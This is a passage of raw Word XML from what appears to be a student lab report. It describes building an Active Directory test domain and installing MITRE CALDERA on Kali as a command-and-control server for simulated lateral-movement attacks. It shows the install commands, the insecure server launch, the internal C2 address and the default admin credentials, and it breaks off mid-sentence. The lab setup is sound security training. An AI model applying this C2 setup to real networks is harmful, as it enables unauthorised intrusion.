      <w:r w:rsidR="00BE54C6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">ervices (AD DS) as well as DNS services </w:t>
      </w:r>
      <w:r w:rsidR="00E17578">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00BE54C6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> configure the domain (this was intended so </w:t>
      </w:r>
      <w:r w:rsidR="002D4E75">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">our lateral movement attack sequences would </w:t>
      </w:r>
      <w:r w:rsidR="00E937C1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>abuse domain and active directory common misconfigurations)</w:t>
      </w:r>
      <w:r w:rsidR="00AB6471">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. After those installations, we promoted the</w:t>
      </w:r>
      <w:r w:rsidR="00866978">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> server</w:t>
      </w:r>
      <w:r w:rsidR="00AB6471">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00866978">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="00E17578">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00AB6471">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">domain controller. </w:t>
      </w:r>
      <w:r w:rsidR="00200517">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">During that process, we </w:t>
      </w:r>
      <w:r w:rsidR="00566276">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">learned </w:t>
      </w:r>
      <w:r w:rsidR="007B7F71">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">how </w:t>
      </w:r>
      <w:r w:rsidR="00566276">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to add a new fores</w:t>
      </w:r>
      <w:r w:rsidR="008177B4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">t </w:t>
      </w:r>
      <w:r w:rsidR="00360573">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00A50C7B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> our network. </w:t>
      </w:r>
      <w:r w:rsidR="00F86BDA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The desired root name </w:t>
      </w:r>
      <w:r w:rsidR="008A2BB5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>created was corp.dumbnetwork.com.</w:t>
      </w:r>
      <w:r w:rsidR="003031D6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> In a nutshell, after configuring those defaults we </w:t>
      </w:r>
      <w:r w:rsidR="00917E5F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">went to both the fileserver and workstation </w:t>
      </w:r>
      <w:r w:rsidR="0052065B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to join them both in the domain </w:t>
      </w:r>
      <w:r w:rsidR="009623F7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">on </w:t>
      </w:r>
      <w:r w:rsidR="0013708D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>computer configurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BCCAF2" w14:textId="77777777" w:rsidR="0081320B" w:rsidRDefault="00B36953" w:rsidP="0081320B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:keepNext/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D831136" wp14:editId="6A2A68A6">
            <wp:extent cx="3089910" cy="2154555"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1233553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539" name="Picture 5"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2154555"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="079A5F73" w14:textId="3B4ABE53" w:rsidR="00520682" w:rsidRPr="007605F6" w:rsidRDefault="0081320B" w:rsidP="007605F6">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00396D73">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig</w:t>
      </w:r>
      <w:r w:rsidR="00396D73">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00396D73">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> 5</w:t>
      </w:r>
      <w:r w:rsidR="00254A10" w:rsidRPr="00396D73">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Both </w:t>
      </w:r>
      <w:r w:rsidR="00FF4D01" w:rsidRPr="00396D73">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>End-user</w:t>
      </w:r>
      <w:r w:rsidR="00254A10" w:rsidRPr="00396D73">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> VMs within the </w:t>
      </w:r>
      <w:r w:rsidR="007D7821" w:rsidRPr="00396D73">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>AD D</w:t>
      </w:r>
      <w:r w:rsidR="00396D73" w:rsidRPr="00396D73">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>S GUI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F61BD6" w14:textId="6A920248" w:rsidR="00032743" w:rsidRDefault="00717179" w:rsidP="00C3014C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The next step was to configure the initial compromise.</w:t>
      </w:r>
      <w:r w:rsidR="00DC3A4F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004D2F2B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We decided to</w:t>
      </w:r>
      <w:r w:rsidR="00D8219B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> configure CALDERA</w:t>
      </w:r>
      <w:r w:rsidR="001C2BD0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00540053">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">following the </w:t>
      </w:r>
      <w:r w:rsidR="006C3DB3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">steps on the tool’s official </w:t>
      </w:r>
      <w:r w:rsidR="00117789">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Git Hub</w:t>
      </w:r>
      <w:r w:rsidR="006C3DB3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F58B44F" w14:textId="77777777" w:rsidR="00DF7706" w:rsidRDefault="00DF7706" w:rsidP="00C3014C">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="600F26C7" w14:textId="4B16795E" w:rsidR="00F91676" w:rsidRPr="002F1914" w:rsidRDefault="006976BF" w:rsidP="00F91676">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Performing Lateral Movement (Observation/Data Collection Phase)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BFA66E" w14:textId="21E73077" w:rsidR="006C4B24" w:rsidRDefault="0068185B" w:rsidP="0068185B">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">In the following section describes </w:t>
      </w:r>
      <w:r w:rsidR="006C7BB5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">the process of how </w:t>
      </w:r>
      <w:r w:rsidR="00EF7806">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">we setup the </w:t>
      </w:r>
      <w:r w:rsidR="00CF39BD">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">command and control (C2) server, initial compromise on ‘user1’ windows 10 workstation, and </w:t>
      </w:r>
      <w:r w:rsidR="002D2570">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">how the </w:t>
      </w:r>
      <w:r w:rsidR="000F43F0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">first attack was executed. </w:t>
      </w:r>
      <w:r w:rsidR="002C5CCA">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">I will say it was quite the learning curve and not everything went perfectly + took troubleshooting along the way, </w:t>
      </w:r>
      <w:r w:rsidR="00D94854">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">but in doing so revealed that a </w:t>
      </w:r>
      <w:r w:rsidR="007A57B7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>misconfigured network can be easily compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D64E8B3" w14:textId="617EC2A8" w:rsidR="00A62959" w:rsidRDefault="00F91676" w:rsidP="006976BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F0224F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">On the Kali virtual machine, </w:t>
      </w:r>
      <w:r w:rsidR="00515E07">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">we </w:t>
      </w:r>
      <w:r w:rsidR="00C3313D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">setup </w:t>
      </w:r>
      <w:r w:rsidR="00C47909">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">these major dependencies: </w:t>
      </w:r>
      <w:r w:rsidR="00297C9E">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>python 3.9, pip3, nodejs, npm, and golang-go</w:t>
      </w:r>
      <w:r w:rsidR="007E3142">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049EC9EC" w14:textId="798D8296" w:rsidR="001176A5" w:rsidRPr="00555FF0" w:rsidRDefault="002A4179" w:rsidP="006976BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Then on MITRE Caldera’s official github, </w:t>
      </w:r>
      <w:r w:rsidR="00BB0F0F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">we did the following </w:t>
      </w:r>
      <w:r w:rsidR="00E667F6">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">commands </w:t>
      </w:r>
      <w:r w:rsidR="00BB0F0F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>on Kali’s terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2854FB7B" w14:textId="2FBA7B04" w:rsidR="002171F9" w:rsidRPr="00650A1F" w:rsidRDefault="00650A1F" w:rsidP="00AB78BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="288" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00650A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="002171F9" w:rsidRPr="00650A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>it clone https://github.com/mitre/caldera.git --recursive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F406889" w14:textId="77777777" w:rsidR="002171F9" w:rsidRPr="00650A1F" w:rsidRDefault="002171F9" w:rsidP="00AB78BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="288" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00650A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cd caldera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F73B37" w14:textId="77777777" w:rsidR="002171F9" w:rsidRPr="00650A1F" w:rsidRDefault="002171F9" w:rsidP="00AB78BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="288" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00650A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pip3 install -r requirements.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268F1D0A" w14:textId="4A811FC3" w:rsidR="00BB0F0F" w:rsidRPr="00650A1F" w:rsidRDefault="002171F9" w:rsidP="00AB78BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="288" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00650A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 server.py --insecure </w:t>
      </w:r>
      <w:r w:rsidR="00070E6D" w:rsidRPr="00650A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">--log DEBUG </w:t>
      </w:r>
      <w:r w:rsidR="00AB78BF" w:rsidRPr="00650A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00650A1F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>build</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FC943F" w14:textId="1E831AC4" w:rsidR="00AB78BF" w:rsidRPr="00555FF0" w:rsidRDefault="00780756" w:rsidP="00AB78BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">It took about </w:t>
      </w:r>
      <w:r w:rsidR="00F37039">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3-5 minutes to do the first build, then everything was ready to go</w:t>
      </w:r>
      <w:r w:rsidR="0020304C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the server was up and running. </w:t>
      </w:r>
      <w:r w:rsidR="00A3229D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We were then able to visit the GUI hosted at </w:t>
      </w:r>
      <w:r w:rsidR="00A3229D" w:rsidRPr="00611980">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://localhost:8888</w:t>
      </w:r>
      <w:r w:rsidR="00A3229D">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BBFCD5" w14:textId="7512278D" w:rsidR="00A3229D" w:rsidRPr="00555FF0" w:rsidRDefault="00A3229D" w:rsidP="00AB78BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">This default however we changed in the server’s configuration file to specify that the GUI and </w:t>
      </w:r>
      <w:r w:rsidR="00727927">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">server communication throughout different ports and sockets was available at Kali’s internal IP…so </w:t>
      </w:r>
      <w:r w:rsidR="00611980" w:rsidRPr="00DA2F22">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://192.168.1.100:8888</w:t>
      </w:r>
      <w:r w:rsidR="00D70D9C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A80D6B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>so</w:t>
      </w:r>
      <w:r w:rsidR="00D70D9C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> our </w:t>
      </w:r>
      <w:r w:rsidR="00A80D6B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>agent deployed on the internal network knew where to report back to</w:t>
      </w:r>
      <w:r w:rsidR="00DA2F22">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEC057B" w14:textId="65FC90AE" w:rsidR="00611980" w:rsidRPr="00555FF0" w:rsidRDefault="00611980" w:rsidP="00AB78BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Rebuilt to update those changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70497F84" w14:textId="4C6B3317" w:rsidR="00A02BC6" w:rsidRPr="00555FF0" w:rsidRDefault="00A02BC6" w:rsidP="00AB78BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Upon viewing the</w:t>
      </w:r>
      <w:r w:rsidR="00737CE4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> hosted GUI, </w:t>
      </w:r>
      <w:r w:rsidR="00A865F1">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we were presented a login that had the default passcode set to admin: admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEBA1E3" w14:textId="1DC64E4D" w:rsidR="00A865F1" w:rsidRPr="00555FF0" w:rsidRDefault="00AE6DF2" w:rsidP="00AB78BF">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Their documentation goes into depth on each functionality but essentially, </w:t>
      </w:r>
      <w:r w:rsidR="001C2ECF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">CALDERA </w:t>
      </w:r>
      <w:r w:rsidR="00EF3700">
        <w:rPr>
          <w:sz w:val="24"/>
